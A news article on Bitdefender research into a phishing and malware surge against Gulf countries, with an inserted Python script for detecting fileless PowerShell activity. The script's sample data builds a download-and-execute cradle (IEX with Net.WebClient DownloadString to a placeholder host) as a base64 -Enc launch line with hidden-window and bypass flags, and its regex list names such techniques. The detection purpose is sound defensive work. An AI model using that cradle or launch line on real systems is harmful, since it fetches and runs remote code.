Bitdefender has published new research that reveals a sharp increase in phishing and malware campaigns targeting Gulf countries following the escalation of the conflict in the Middle East.
According to the company’s analysis, malicious activity began to intensify on February 28, just a few days after the increase in tension in the region, and has remained at significantly elevated levels since then. Specifically, attacks have grown by an average of 130% compared to pre-conflict levels, reaching peaks of activity close to four times the usual volume.
This spike highlights how cybercriminals are able to take advantage of geopolitical events in real time to increase the effectiveness of their campaigns. In this case, attackers have mainly resorted to business-themed lures – such as invoices, contracts, bank communications or delivery notifications – to deceive both organizations and individual users.
Techniques and methods of detected attacks
Bitdefender's research identifies advanced techniques such as Java-based remote access Trojans (the STRRAT family) and fileless PowerShell attacks (attacks that write no files to disk and abuse built-in system tools to evade detection). These threats operate in memory to make detection difficult. Likewise, complex infection chains have been observed that are designed to guarantee persistence within compromised systems.
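Fileless PowerShell chains like the ones described above leave little on disk, so detection depends on process-creation and script-block telemetry rather than file scanning. The following Python script is an added illustration, not code from the Bitdefender report: it scores constructed sample command lines against heuristic indicators of in-memory execution and decodes -EncodedCommand blobs first, so the scoring sees the script that would actually run. The indicator list, weights, threshold and sample records are assumptions made for this example.

```python
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Heuristic indicators of fileless / in-memory PowerShell execution. These are
# assumptions modelled on common public detection rules, not a list taken from
# the Bitdefender report. Each entry is (regex, weight).
INDICATORS = {
    "encoded_command": (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I), 2),
    "invoke_expression": (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    "download_cradle": (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), 3),
    "reflective_load": (re.compile(r"reflection\.assembly\]::load", re.I), 3),
    "base64_decode": (re.compile(r"frombase64string", re.I), 1),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    "policy_bypass": (re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I), 1),
}
SUSPICIOUS_THRESHOLD = 4  # assumed tuning value; adjust to your own baseline


@dataclass
class Finding:
    record_id: int
    hits: list
    decoded: Optional[str]
    score: int

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text)."""
    match = INDICATORS["encoded_command"][0].search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record_id: int, command_line: str) -> Finding:
    """Score one command line. The decoded payload is scanned too, because the
    telling indicators are usually hidden inside the encoded blob."""
    decoded = decode_encoded_command(command_line)
    text = command_line if decoded is None else f"{command_line}\n{decoded}"
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    score = sum(INDICATORS[name][1] for name in hits)
    return Finding(record_id, hits, decoded, score)


def triage(records) -> list:
    """Analyze a batch of (id, command_line) pairs, most suspicious first."""
    return sorted((analyze(i, c) for i, c in records), key=lambda f: -f.score)


# Constructed sample records standing in for process-creation log entries.
# Record 2 is a stereotyped in-memory execution chain; the others are ordinary
# administrative use that should stay below the threshold.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode("ascii")
SAMPLE_RECORDS = [
    (1, 'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Reports | Measure-Object"'),
    (2, f"powershell.exe -NoP -W Hidden -Ex Bypass -Enc {_ENCODED}"),
    (3, 'powershell.exe -Command "Invoke-WebRequest https://updates.example.invalid/p.msi -OutFile C:\\Temp\\p.msi"'),
    (4, "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        flag = "SUSPICIOUS" if f.suspicious else "ok"
        print(f"record {f.record_id}: score={f.score} {flag} hits={f.hits}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

Only record 2 crosses the threshold; record 3 (a plain Invoke-WebRequest) scores below it, which is the point of weighting rather than matching single keywords. In production the same logic would run over Sysmon event 1 or Windows 4688/4104 exports, and the threshold and weights would be tuned against the environment's normal administrative scripting.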
Although some campaigns make direct reference to the current geopolitical context, Bitdefender notes that there is no confirmed attribution to state actors, and that much of the activity could be linked to opportunistic cybercriminals. However, it warns that this type of attack is usually the gateway to more sophisticated threats, by facilitating initial access to corporate environments.
In addition to the sustained increase in malicious emails directed at Gulf countries, the company highlights a series of further key findings:
- Peak activity increased approximately fourfold compared to pre-war phishing levels, with several consecutive days of high volume.
- Campaigns rely heavily on business-themed lures: invoices, contracts, banking, and deliveries.
- Attackers use multiple malware delivery techniques, including Java-based RATs and fileless PowerShell chains.
- Evidence of multi-stage attacks designed for stealth and persistence.
- The infrastructure and themes sometimes reference current geopolitical events.
- At this stage the activity has not been directly attributed to state-sponsored threat actors; such activity could include opportunistic cybercrime campaigns that exploit the situation.
